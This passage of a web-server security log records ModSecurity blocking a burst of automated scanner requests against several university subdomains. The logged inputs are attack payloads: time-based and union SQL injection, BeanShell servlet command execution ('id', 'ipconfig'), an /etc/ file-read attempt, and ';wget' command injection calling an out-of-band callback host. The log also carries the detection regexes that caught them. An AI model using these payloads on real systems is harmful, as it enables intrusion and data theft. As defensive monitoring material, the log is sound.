"informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPiBigAAAAB"]
[Tue Aug 29 11:30:46.324415 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPRNccAAAAf"]
[Tue Aug 29 11:30:46.357218 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dsCo-f0AAAPRNcgAAAAf"]
[Tue Aug 29 11:30:46.358436 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dsCo-f0AAAPMmDAAAAAY"]
[Tue Aug 29 11:30:46.367386 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPDn0YAAAAP"]
[Tue Aug 29 11:30:47.376015 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPOhakAAAAa"]
[Tue Aug 29 11:30:47.377252 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAOM4YsAAAAU"]
[Tue Aug 29 11:30:47.383130 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPMmDMAAAAY"]
[Tue Aug 29 11:30:47.384941 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPRNcoAAAAf"]
[Tue Aug 29 11:30:47.388840 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPPSxUAAAAd"]
[Tue Aug 29 11:30:47.389498 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAN@4-0AAAAO"]
[Tue Aug 29 11:30:47.428188 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPiBi0AAAAB"]
[Tue Aug 29 11:30:47.432188 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPpWecAAAAI"]
[Tue Aug 29 11:30:47.438511 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPMmDQAAAAY"]
[Tue Aug 29 11:30:47.440221 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPmhNoAAAAV"]
[Tue Aug 29 11:30:47.443707 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAP05F8AAAAA"]
[Tue Aug 29 11:30:47.513104 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPMmDUAAAAY"]
[Tue Aug 29 11:30:47.537834 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPMmDYAAAAY"]
[Tue Aug 29 11:30:47.543074 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO10d8Co-f0AAAPxBUMAAAAS"]
[Tue Aug 29 11:30:47.567807 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAOM4Y0AAAAU"]
[Tue Aug 29 11:30:47.606858 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPPSxgAAAAd"]
[Tue Aug 29 11:30:48.300350 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg57n4hayqeh3x7.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPMmDcAAAAY"]
[Tue Aug 29 11:30:48.310772 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgxfaxz5uf3rw9q.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPxBUUAAAAS"]
[Tue Aug 29 11:30:48.312048 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPRNc4AAAAf"]
[Tue Aug 29 11:30:48.313165 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPiBjAAAAAB"]
[Tue Aug 29 11:30:48.316497 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPmhN0AAAAV"]
[Tue Aug 29 11:30:48.340758 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgkpbbsbyuhmb6k.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPRNc8AAAAf"]
[Tue Aug 29 11:30:48.341527 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgyinjetbzyjss8.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPpWesAAAAI"]
[Tue Aug 29 11:30:48.342937 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAP05GMAAAAA"]
